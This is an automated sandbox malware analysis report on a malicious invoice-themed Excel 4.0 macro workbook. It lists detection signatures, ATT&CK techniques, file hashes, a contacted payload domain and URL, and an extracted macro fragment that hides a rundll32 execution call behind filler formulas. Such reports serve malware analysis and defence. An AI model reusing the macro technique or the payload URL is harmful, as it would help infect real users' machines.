Play interactive tourEdit tour
Analysis Report invoice_661434949_67552437.xlsm
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for domain / URL | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
12% | Virustotal | Browse | ||
100% | Avira URL Cloud | phishing | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
indianoci.co.uk | 104.21.43.238 | true | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.21.43.238 | indianoci.co.uk | United States | 13335 | CLOUDFLARENETUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 385000 |
Start date: | 11.04.2021 |
Start time: | 00:10:56 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 29s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | invoice_661434949_67552437.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal80.expl.evad.winXLSM@3/10@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
104.21.43.238 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
indianoci.co.uk | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4318 |
Entropy (8bit): | 4.960548542883275 |
Encrypted: | false |
SSDEEP: | 96:1j9jwIjYjyDK/DZD8jH+k1sFvJADh/pRsfsIszbGD:1j9jhjYjWK/lyH+kARADh/pmfsIsfGD |
MD5: | 10E7CF5F758D041A498D76EA11F368BE |
SHA1: | 3C05C54B7E39AFCE95E60A2A7410194E5AE63CB7 |
SHA-256: | 422424BA14F529B2193794441E7D7EA69E1598D00956375481D83699544B6735 |
SHA-512: | 94277567C383B1C5F30BE977B80660F5D0DD3888FBE2E99BB39397F004AD214CFC40D7ACFE0CCF9DEDF6E5B099DA0D8A4A9D2176B2D75A61EE50AD75BDC1E5EF |
Malicious: | false |
Reputation: | low |
IE Cache URL: | http://indianoci.co.uk/ufriends/support.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 169558 |
Entropy (8bit): | 7.988183859518103 |
Encrypted: | false |
SSDEEP: | 3072:KTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGv:KrV4mnVqbTEnRMs |
MD5: | 2A06BF86C977F9A29739FD65CE53B5BE |
SHA1: | 33C88641A06413C919903497577EEA54ED03FAA0 |
SHA-256: | 4C18B1BFA7CD6C6048A5637FF7F753B78435E70FAB6BA74125EC7D633F7A3F9F |
SHA-512: | 71E29BE3A7A31A7650892A599C88C99CB25BF4B60DD6172BAAF849036562E3E141605543FCACD9389D73B04535C270543B0B4D55272809EEA6ABFB2E3764D2C8 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 184279 |
Entropy (8bit): | 7.96535016571193 |
Encrypted: | false |
SSDEEP: | 3072:LZnURTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGhFF:LZn8rV4mnVqbTEnRM+ |
MD5: | A5BF33A3C05F7D7C3CFA963B69299E5A |
SHA1: | C60AC1F23B57458BFA14EC2350D5AC6481FAE008 |
SHA-256: | 7CFD1262A350CBA2D2A46D563F8A296EAF7CD151D6B14E0319003AD5A4D3BCB2 |
SHA-512: | B5BD5F924CCB9F12926F9055A402EF867C5EFC2C3A8D192C098267E4D59B30DC6AA829E29AC6BAB5E58E9EEEE0348B871C634F64F3BD4D8A7C396E63C80FE8B0 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.474922313871348 |
Encrypted: | false |
SSDEEP: | 12:85QNm8LgXg/XAlCPCHaX7B8NB/c46X+Wnicvbw3+bDtZ3YilMMEpxRljK7PTdJP8:85M/XTr6Nt6Yek3SDv3qarNru/ |
MD5: | 02C3D67E8B5892845174D590F43538FD |
SHA1: | FC497AEBDD50C17B637780750F85649E615065A1 |
SHA-256: | 2B645F70EA210272EC0B84A998C9C79BA5A3B382375B7E7DC182397967FF1412 |
SHA-512: | FBB12C573E5B2513FA67123DBE2539CF455E3AC3BAD4EDAC939C9DD91F37A3B292E07A211D8E52345F94283230E9E5A39CD31A5473474B10F1BE057100C68408 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133 |
Entropy (8bit): | 4.7282044051464736 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWHnKb8W/g4p6YCULE8W/g4p6YCmxWHnKb8W/g4p6YCv:dj0nKbNgkz5ENgkzanKbNgkzs |
MD5: | 72BF292971159E1F67067B783778231A |
SHA1: | FAB451945E815CF506AC41935E3F8AF1B46C4D22 |
SHA-256: | 1751B59DDF72E20449AFEAF5EE7ED65962FCAEA8C35E089E2745CFE8A6C26B6D |
SHA-512: | 96E536B06D7261A9CB1E4B15706BC8A9AFF91E895FE42E266C32488BD5A654A205BBB93CBED107DCE03A860AE79C540ED57AFF2BD8709F16D7CF45B41997F3B3 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2198 |
Entropy (8bit): | 4.561386506168734 |
Encrypted: | false |
SSDEEP: | 48:84a/XT+NnlBv/3SBqaQh24a/XT+NnlBv/3SBqaQ/:84a/X6NnlBCBqaQh24a/X6NnlBCBqaQ/ |
MD5: | 687051452BC2F77D72B22F577901886B |
SHA1: | 2415855383CCE43DF59225BB87EA542AC47A6DC5 |
SHA-256: | 569E30D1479F86CD319B1A0C8B13E60FE62637A0E17B9A585AF4CD9371BEFA92 |
SHA-512: | E9B9814A3FDDB3B31182640EDB9D070D0322CDD467798AB619F9C511F00553B3AE058B8707C042D116118C69A8BA2B086CEEA60A8D509E4B5F8B63EF9D2419FB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 117 |
Entropy (8bit): | 4.293191264085757 |
Encrypted: | false |
SSDEEP: | 3:GmM/gVXWOg+DTRD7TEVmSVCqvGQQ1cldYUZvcSv:XM/RMRD7gmhEe105Bcc |
MD5: | 0955DECC24CF4729D752A9B53C933A4D |
SHA1: | EBDD0FEAA58E425364A68C558DFA56786E57341F |
SHA-256: | C8EEFEF799A43E339F93F6F644595C2648CCB467DE30AA301456BA20111D16C2 |
SHA-512: | 7B515D7B8A9BBED2B24470853CEC750F34F136591002DBA3161B95BF29AEBA7BCD2C70BA6FF698B9ABD355BDA83BB9C0B2B8611640BEDE176743DDD1E64E1E3B |
Malicious: | false |
Reputation: | low |
IE Cache URL: | indianoci.co.uk/ |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 184279 |
Entropy (8bit): | 7.96535016571193 |
Encrypted: | false |
SSDEEP: | 3072:LZnURTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGhFF:LZn8rV4mnVqbTEnRM+ |
MD5: | A5BF33A3C05F7D7C3CFA963B69299E5A |
SHA1: | C60AC1F23B57458BFA14EC2350D5AC6481FAE008 |
SHA-256: | 7CFD1262A350CBA2D2A46D563F8A296EAF7CD151D6B14E0319003AD5A4D3BCB2 |
SHA-512: | B5BD5F924CCB9F12926F9055A402EF867C5EFC2C3A8D192C098267E4D59B30DC6AA829E29AC6BAB5E58E9EEEE0348B871C634F64F3BD4D8A7C396E63C80FE8B0 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4318 |
Entropy (8bit): | 4.960548542883275 |
Encrypted: | false |
SSDEEP: | 96:1j9jwIjYjyDK/DZD8jH+k1sFvJADh/pRsfsIszbGD:1j9jhjYjWK/lyH+kARADh/pmfsIsfGD |
MD5: | 10E7CF5F758D041A498D76EA11F368BE |
SHA1: | 3C05C54B7E39AFCE95E60A2A7410194E5AE63CB7 |
SHA-256: | 422424BA14F529B2193794441E7D7EA69E1598D00956375481D83699544B6735 |
SHA-512: | 94277567C383B1C5F30BE977B80660F5D0DD3888FBE2E99BB39397F004AD214CFC40D7ACFE0CCF9DEDF6E5B099DA0D8A4A9D2176B2D75A61EE50AD75BDC1E5EF |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.965561623864126 |
TrID: |
|
File name: | invoice_661434949_67552437.xlsm |
File size: | 184803 |
MD5: | 64f33ccbc7976306417b2b2528daa5fe |
SHA1: | d71433580e83ab455556a88c483d1887e9641be6 |
SHA256: | 03a7d4fc0e9d75fb98ca2aba43729acb93803959b1421d8878548643c12e3d73 |
SHA512: | f111800a5f1de2d2cec569448810eefd8999c99d9e78d5414b3bc662dbb607131a7a69f7236c929b769347d3430c9090c1144a3946c6a2d3d1d7d84236940ecf |
SSDEEP: | 3072:eSnTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMG9m:eSnrV4mnVqbTEnRML |
File Content Preview: | PK..........!."..Z....f.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "invoice_661434949_67552437.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,l,,l,..\GVer.iks,3"=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=EXEC(""rund""&G12&G13&G14&G15&"" ""&F14&"",StartW"")",,2,,=RETURN(),,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
